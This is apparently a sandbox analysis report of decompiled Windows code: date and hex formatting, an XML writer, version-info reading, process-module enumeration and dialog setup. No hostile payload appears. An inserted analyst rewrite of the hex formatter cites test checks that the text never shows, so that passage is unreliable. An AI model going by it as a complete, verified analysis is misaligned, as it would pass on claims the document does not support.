                                                                                                                                                
                                                                                                                                                				_t15 = __eax;
                                                                                                                                                				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
                                                                                                                                                					if(FileTimeToSystemTime(_t15,  &_v24) == 0 || _v24 <= 0x3e8) {
                                                                                                                                                						goto L5;
                                                                                                                                                					} else {
                                                                                                                                                						GetDateFormatW(0x400, 1,  &_v24, 0,  &_v280, 0x80);
                                                                                                                                                						GetTimeFormatW(0x400, 0,  &_v24, 0,  &_v536, 0x80);
                                                                                                                                                						wcscpy(_a4,  &_v280);
                                                                                                                                                						wcscat(_a4, " ");
                                                                                                                                                						wcscat(_a4,  &_v536);
                                                                                                                                                					}
                                                                                                                                                				} else {
                                                                                                                                                					L5:
                                                                                                                                                					wcscpy(_a4, 0x40f454);
                                                                                                                                                				}
                                                                                                                                                				return _a4;
                                                                                                                                                			}
                                                                                                                                                0x00405c17
                                                                                                                                                0x00405c28
                                                                                                                                                0x00405c3b
                                                                                                                                                0x00000000
                                                                                                                                                0x00405c45
                                                                                                                                                0x00405c5f
                                                                                                                                                0x00405c74
                                                                                                                                                0x00405c84
                                                                                                                                                0x00405c91
                                                                                                                                                0x00405ca0
                                                                                                                                                0x00405ca5
                                                                                                                                                0x00405caa
                                                                                                                                                0x00405caa
                                                                                                                                                0x00405cb2
                                                                                                                                                0x00405cb8
                                                                                                                                                0x00405cc0

                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00405C33
                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080), ref: 00405C5F
                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080), ref: 00405C74
                                                                                                                                                • wcscpy.MSVCRT ref: 00405C84
                                                                                                                                                • wcscat.MSVCRT ref: 00405C91
                                                                                                                                                • wcscat.MSVCRT ref: 00405CA0
                                                                                                                                                • wcscpy.MSVCRT ref: 00405CB2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1331804452-0
                                                                                                                                                • Opcode ID: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
                                                                                                                                                • Instruction ID: cbd8c252d2d2ef195a4c0e5b8e64ca40110f1bd057fda192b525793d095b5ed7
                                                                                                                                                • Opcode Fuzzy Hash: 2cd0e4f62e7c226bb1a7a6623729ec2332546ff41dbb1f6ce7e94b14287b325c
                                                                                                                                                • Instruction Fuzzy Hash: 57116072900209AFEB20AB90DD45EEF776CEB04314F104076FA05B6091E675AE49CAB9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

C-Code - Quality: 71%
// Hex-dump formatter: writes the 0x80 bytes at _a4 into the wide-string buffer
// __edi as uppercase "%2.2X" pairs, one space between bytes, plus two extra
// spaces at every index that is a multiple of _a8 (the i % _a8 == 0 test also
// fires at i == 0, so a grouped dump starts with two spaces). L0040DFD6 is the
// _snwprintf thunk (see the API ID below); the four pushes match
// _snwprintf(&_v516, 0xff, L"%2.2X", byte). Appends use unbounded wcscat.
// Left column: instruction address of each statement.
            E00405D33(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                void _v514;
                long _v516;
                wchar_t* _t34;
                signed int _t35;
                void* _t36;
                void* _t37;

0x00405d33      _t34 = __edi;
0x00405d3c      _v516 = _v516 & 0x00000000;
0x00405d53      memset( &_v514, 0, 0x1fc);
0x00405d58       *__edi =  *__edi & 0x00000000;
0x00405d5c      _t37 = _t36 + 0xc;
0x00405d5f      _t35 = 0;
0x00405d61      do {
0x00405d68          _push( *(_t35 + _a4) & 0x000000ff);
0x00405d69          _push(L"%2.2X");
0x00405d74          _push(0xff);
0x00405d79          _push( &_v516);
0x00405d7a          L0040DFD6();
0x00405d7f          _t37 = _t37 + 0x10;
0x00405d84          if(_t35 > 0) {
0x00405d8c              wcscat(_t34, " ");
0x00405d92          }
0x00405d97          if(_a8 > 0) {
0x00405d9b              asm("cdq");
0x00405da1              if(_t35 % _a8 == 0) {
0x00405da9                  wcscat(_t34, L"  ");
0x00405daf              }
0x00405da1          }
0x00405db8          wcscat(_t34,  &_v516);
0x00405dbd          _t35 = _t35 + 1;
0x00405dc5      } while (_t35 < 0x80);
0x00405dcc      return _t34;
            }
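The formatter above (E00405D33) rewritten as a bounded, runnable routine. This is an added analyst example, not code recovered from the sample: the names format_hex_block, append_w, format_matches and sample_bytes are my own, the input bytes are constructed, and the `len` parameter generalises the sample's fixed 0x80-byte block. It reproduces the sample's output layout exactly, including the two leading spaces a grouped dump gets at index 0, so the format can be recognised in captured output.

```c
#include <stddef.h>
#include <stdio.h>
#include <wchar.h>

/* Append `s` to `out` without overrunning `out_len` wide chars; returns 0
 * (and appends nothing) when it would not fit. The sample itself uses
 * plain wcscat with no bound. */
static int append_w(wchar_t *out, size_t out_len, size_t *pos, const wchar_t *s)
{
    size_t n = wcslen(s);
    if (*pos + n >= out_len)
        return 0;
    wmemcpy(out + *pos, s, n + 1);   /* n chars plus the terminating NUL */
    *pos += n;
    return 1;
}

/* Format `len` bytes of `data` the way E00405D33 does: "%2.2X" per byte,
 * one space between bytes, and two extra spaces at every index that is a
 * multiple of `group` (the sample tests i % group == 0, which also fires
 * at i == 0). The sample always formats exactly 0x80 bytes; `len` is an
 * assumed generalisation. Returns the number of wide characters written,
 * excluding the NUL; stops early rather than overflow `out`. */
size_t format_hex_block(const unsigned char *data, size_t len, size_t group,
                        wchar_t *out, size_t out_len)
{
    size_t pos = 0;
    if (out_len == 0)
        return 0;
    out[0] = L'\0';
    for (size_t i = 0; i < len; i++) {
        wchar_t hex[4];                       /* "FF" plus NUL */
        swprintf(hex, 4, L"%2.2X", (unsigned)data[i]);
        if (i > 0 && !append_w(out, out_len, &pos, L" "))
            break;
        if (group > 0 && i % group == 0 && !append_w(out, out_len, &pos, L"  "))
            break;
        if (!append_w(out, out_len, &pos, hex))
            break;
    }
    return pos;
}

/* Constructed sample input for the demonstration. */
static const unsigned char sample_bytes[4] = { 0x00, 0x01, 0xff, 0x7f };

/* Returns 1 when formatting `data` into a buffer of `out_len` wide chars
 * yields exactly `expected` (both the text and the returned length). */
int format_matches(const unsigned char *data, size_t len, size_t group,
                   size_t out_len, const wchar_t *expected)
{
    wchar_t buf[256];
    if (out_len > 256)
        out_len = 256;
    size_t n = format_hex_block(data, len, group, buf, out_len);
    return n == wcslen(expected) && wcscmp(buf, expected) == 0;
}

int main(void)
{
    wchar_t buf[64];
    format_hex_block(sample_bytes, 4, 0, buf, 64);
    wprintf(L"ungrouped:    [%ls]\n", buf);   /* [00 01 FF 7F] */
    format_hex_block(sample_bytes, 4, 2, buf, 64);
    wprintf(L"grouped by 2: [%ls]\n", buf);   /* [  00 01   FF 7F] */
    return 0;
}
```

The third case in the checks below passes a 5-character buffer: the bounded version stops after "00 " instead of writing past the end, which is the one behavioural difference from the decompiled routine's unbounded wcscat calls.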

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                                                • Opcode ID: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
                                                                                                                                                • Instruction ID: cee391cc34d681d13bec3c3f8d39c8b6c523e2a4e61045ff621ae80f21b9d711
                                                                                                                                                • Opcode Fuzzy Hash: 8d613fde9fab4d933d9f195fd49a4c987f01c631fdcf44825a32ae19885f2fe7
                                                                                                                                                • Instruction Fuzzy Hash: 86012873E403196AE73067519C4ABBB33A8EF44714F10807BFC15F51C2EB7C99498A88
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

C-Code - Quality: 46%
// XML writer, root-element opener: emits an XML declaration through E00408857
// (with encoding="ISO-8859-1" when the object's member at +0x24 is zero,
// without an encoding attribute otherwise), then obtains the root element
// name from the virtual method at vtable slot +0x24, converts it via
// E004086F5, formats "<%s>\r\n" with _snwprintf (L0040DFD6) into _v1028 and
// writes that through E00408857 as well. Left column: instruction address of
// each statement; the string xrefs listed below match these addresses.
            E004093B3(intOrPtr* __ecx, intOrPtr _a4) {
                void _v514;
                char _v516;
                void _v1026;
                char _v1028;
                void* __esi;
                intOrPtr* _t16;
                void* _t19;
                intOrPtr* _t29;
                char* _t31;

0x004093b3      _t27 = __ecx;
0x004093cf      _t29 = __ecx;
0x004093d1      _v516 = 0;
0x004093d8      memset( &_v514, 0, 0x1fc);
0x004093e6      _v1028 = 0;
0x004093ed      memset( &_v1026, 0, 0x1fc);
0x004093f8      _t16 = _t29;
0x004093fa      if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
0x00409403          _push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
0x004093fc      } else {
0x004093fc          _push(L"<?xml version=\"1.0\" ?>\r\n");
0x004093fc      }
0x0040940b      E00408857(_t16, _t27);
0x00409414      _t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
0x00409418      _t31 =  &_v516;
0x0040941e      E004086F5(_t31, _t19);
0x00409425      _push(_t31);
0x00409426      _push(L"<%s>\r\n");
0x00409431      _push(0xff);
0x00409436      _push( &_v1028);
0x00409437      L0040DFD6();
0x00409454      return E00408857(_t29, _t29, _a4,  &_v1028);
            }

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • <?xml version="1.0" ?>, xrefs: 004093FC
                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00409403
                                                                                                                                                • <%s>, xrefs: 00409426
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                                                • Opcode ID: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
                                                                                                                                                • Instruction ID: 5b2b9264402656275e8c2dd0f1d17c7e9a998e95cf6bd8efe94fc2853a0f1184
                                                                                                                                                • Opcode Fuzzy Hash: cfaef87a50fb87b193c4db31b2271390d66c635945fe0e38d6c8237e7c0c562e
                                                                                                                                                • Instruction Fuzzy Hash: 57019BB2A001197AD720BA59CD41EAA766CEF44348F0040BBB60DF3192DB789E4586A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Reads one string from a VERSIONINFO block: builds the sub-block path
// "\StringFileInfo\<_a8>\<_a12>" (language/code-page id, then the value name,
// e.g. a field such as FileDescription) in _v524 and queries it with
// VerQueryValueW on the version buffer _a4. On success it copies at most 0xff
// characters of the value into _v1036 (E004055FF) and hands that to E004056C9
// on __esi, returning 1; returns 0 when the key is absent. Path building uses
// unbounded wcscpy/wcscat.
            E0040DDA7(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                void* _v8;
                int _v12;
                short _v524;
                char _v1036;
                void* __edi;

                wcscpy( &_v524, L"\\StringFileInfo\\");
                wcscat( &_v524, _a8);
                wcscat( &_v524, "\\");
                wcscat( &_v524, _a12);
                if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                    return 0;
                }
                _t34 =  &_v1036;
                E004055FF(0xff,  &_v1036, _v8);
                E004056C9(_t34, __esi);
                return 1;
            }

0x0040ddbc
0x0040ddcb
0x0040dddc
0x0040ddeb
0x0040de0c
0x00000000
0x0040de30
0x0040de17
0x0040de1d
0x0040de25
0x00000000

APIs
• wcscpy.MSVCRT ref: 0040DDBC
• wcscat.MSVCRT ref: 0040DDCB
• wcscat.MSVCRT ref: 0040DDDC
• wcscat.MSVCRT ref: 0040DDEB
• VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040DE05
  • Part of subcall function 004055FF: wcslen.MSVCRT ref: 00405606
  • Part of subcall function 004055FF: memcpy.MSVCRT ref: 0040561C
  • Part of subcall function 004056C9: lstrcpyW.KERNEL32 ref: 004056DE
  • Part of subcall function 004056C9: lstrlenW.KERNEL32(?), ref: 004056E5
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
• String ID: \StringFileInfo\
• API String ID: 393120378-2245444037
• Opcode ID: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
• Instruction ID: 65d82e6da75efbf52a81394e95eb84ccec4353c565c4c92e21fc1f2e9f7c11b1
• Opcode Fuzzy Hash: 7a910a675bd023779c6e6c6733b87f6ed7a0651bffc855d95701a4bfc6eddd32
• Instruction Fuzzy Hash: B701717290020DAACF10EAE1CC45EDF777D9B04304F0005B7B555F2092EA78EA999B58
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: _snwprintfwcscpy
• String ID: dialog_%d$general$menu_%d$strings
• API String ID: 999028693-502967061
• Opcode ID: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
• Instruction ID: 89c1d54e0424cdf8955af57a35c4f81b258c2803f9b3bbee4052a97a94dd298f
• Opcode Fuzzy Hash: dd6e75e1c219d61954c27f946452bcb1a006fb049640af874a458e11e3f78cea
• Instruction Fuzzy Hash: 61E08672B8830131F93452452E03B2A2190EA94B18F724C7BF54BF05D2E6FD9874650F
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 38%
			E0040CBD8(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040E340(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E0040591F() == 0) {
					L12:
					__eflags =  *0x41325c - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x4128dc(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x4128d4(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E0040CDF8(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x4128d0(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x413260 - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x4128e0() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x4128d8(_v16, _t78,  &_a1616, 0x104);
										E0040CAF2( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x4128e4() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E0040CDF8(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}

                                                                                                                                                APIs
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040C2CF,00000000,00000000), ref: 0040CC13
                                                                                                                                                • memset.MSVCRT ref: 0040CC75
                                                                                                                                                • memset.MSVCRT ref: 0040CC85
                                                                                                                                                  • Part of subcall function 0040CAF2: wcscpy.MSVCRT ref: 0040CB1B
                                                                                                                                                • memset.MSVCRT ref: 0040CD70
                                                                                                                                                • wcscpy.MSVCRT ref: 0040CD91
                                                                                                                                                • CloseHandle.KERNEL32(?,0040C2CF,?,?,?,0040C2CF,00000000,00000000), ref: 0040CDE7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3300951397-0
                                                                                                                                                • Opcode ID: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
                                                                                                                                                • Instruction ID: e16d66228f4dae7d6f5bcc77b9324eed5b76837c7fa80b75a9be3f82a58a018a
                                                                                                                                                • Opcode Fuzzy Hash: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
                                                                                                                                                • Instruction Fuzzy Hash: 93513C71108344EBD720EF65C884A9BBBE8FF84304F004A3EF589E6191DB75D945CB5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 90%
                                                                                                                                                			E004036F7(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                                				struct HWND__* _t29;
                                                                                                                                                				intOrPtr* _t54;
                                                                                                                                                				struct HWND__* _t61;
                                                                                                                                                				struct HWND__* _t62;
                                                                                                                                                				intOrPtr* _t66;
                                                                                                                                                				void* _t67;
                                                                                                                                                				intOrPtr* _t68;
                                                                                                                                                
                                                                                                                                                				_t58 = __edx;
                                                                                                                                                				_push(__ebx);
                                                                                                                                                				_t66 = __ecx;
                                                                                                                                                				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
                                                                                                                                                				_t61 = GetDlgItem( *(_t66 + 0x10), 0x40c);
                                                                                                                                                				E00405700(_t61, E00406827(0x2ef), 1);
                                                                                                                                                				E00405700(_t61, E00406827(0x2f0), 2);
                                                                                                                                                				SendMessageW(_t61, 0x160, 0x15e, 0);
                                                                                                                                                				_t62 = GetDlgItem( *(_t66 + 0x10), 0x40e);
                                                                                                                                                				E00405700(_t62, E00406827(0x2f9), 1);
                                                                                                                                                				E00405700(_t62, E00406827(0x2fa), 2);
                                                                                                                                                				E00405700(_t62, E00406827(0x2fb), 3);
                                                                                                                                                				E00405700(_t62, E00406827(0x2fc), 4);
                                                                                                                                                				E00405700(_t62, E00406827(0x2fd), 5);
                                                                                                                                                				SendMessageW(_t62, 0x160, 0x15e, 0);
                                                                                                                                                				_t29 = GetDlgItem( *(_t66 + 0x10), 0x40f);
                                                                                                                                                				_t63 = _t29;
                                                                                                                                                				SendMessageW(_t29, 0x160, 0x15e, 0);
                                                                                                                                                				E00405700(_t29, E00406827(0x30d), 1);
                                                                                                                                                				E00405700(_t63, E00406827(0x30e), 2);
                                                                                                                                                				_t54 = _t66;
                                                                                                                                                				_pop(_t67);
                                                                                                                                                				_t68 = _t54;
                                                                                                                                                				 *((intOrPtr*)( *_t68 + 4))(1, _t67);
                                                                                                                                                				 *((intOrPtr*)( *_t68 + 0x1c))();
                                                                                                                                                				E00405B17(_t58,  *((intOrPtr*)(_t68 + 0x10)), 4);
                                                                                                                                                				return 0;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
                                                                                                                                                  • Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C
                                                                                                                                                • GetDlgItem.USER32 ref: 00403716
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
                                                                                                                                                  • Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
                                                                                                                                                  • Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F
                                                                                                                                                  • Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
                                                                                                                                                  • Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729
                                                                                                                                                  • Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
                                                                                                                                                  • Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
                                                                                                                                                  • Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040374F
                                                                                                                                                • GetDlgItem.USER32 ref: 0040375D
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037DA
                                                                                                                                                • GetDlgItem.USER32 ref: 004037E4
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037F5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$ItemWindow$HandleModule$ClientLoadRectStringmemcpywcscpywcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3030901043-0
                                                                                                                                                • Opcode ID: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
                                                                                                                                                • Instruction ID: 086a44b27e78f4b83ae4b6e77ae60044790fc96d4b444eb8a6a68cf3e2127a69
                                                                                                                                                • Opcode Fuzzy Hash: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
                                                                                                                                                • Instruction Fuzzy Hash: 9E21A3B6640700B7E11132625C87F3B26ACDB45B2DF42143EFB517A1C3D9BE5816256D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 44%
                                                                                                                                                			E00401810(void* __ebx) {
                                                                                                                                                				struct tagRECT _v20;
                                                                                                                                                				struct tagPAINTSTRUCT _v84;
                                                                                                                                                
                                                                                                                                                				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                                                                				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                                                                				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                                                                				asm("movsd");
                                                                                                                                                				asm("movsd");
                                                                                                                                                				asm("movsd");
                                                                                                                                                				asm("movsd");
                                                                                                                                                				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                                                                				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                                                                			}


                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 19018683-0
                                                                                                                                                • Opcode ID: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
                                                                                                                                                • Instruction ID: 1a6c8e31efcae22bf085037e8d33cf81da157de282c50ef6ca12fa9021a14783
                                                                                                                                                • Opcode Fuzzy Hash: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
                                                                                                                                                • Instruction Fuzzy Hash: 7A01FF72900218EFDF14DFA4DD459FE7B79FB45301F000479EA11BA194DA71AA08CB50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E0040B659(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				void _v518;
                                                                                                                                                				signed short _v520;
                                                                                                                                                				void* __ebx;
                                                                                                                                                				void* __edi;
                                                                                                                                                				void* __esi;
                                                                                                                                                				int _t46;
                                                                                                                                                				void* _t64;
                                                                                                                                                				intOrPtr* _t71;
                                                                                                                                                				intOrPtr _t73;
                                                                                                                                                
                                                                                                                                                				_t67 = __ecx;
                                                                                                                                                				_t73 = __ecx;
                                                                                                                                                				_t71 = _a8;
                                                                                                                                                				_v8 = __ecx;
                                                                                                                                                				if(_a4 == 0x101 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t71 + 0xc)) == 1) {
                                                                                                                                                					_v520 = _v520 & 0x00000000;
                                                                                                                                                					memset( &_v518, 0, 0x1fe);
                                                                                                                                                					E00401000( &_v520, _t67, 0x41203c);
                                                                                                                                                					_t46 = E00405CD2( *((intOrPtr*)(_t73 + 0x208)),  &_v520);
                                                                                                                                                					_t71 = _a8;
                                                                                                                                                				}
                                                                                                                                                				if( *(_t71 + 4) == 0x103 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffff4) {
                                                                                                                                                					_t46 = E00407DC0( *((intOrPtr*)(_t73 + 0x69c)), _t71);
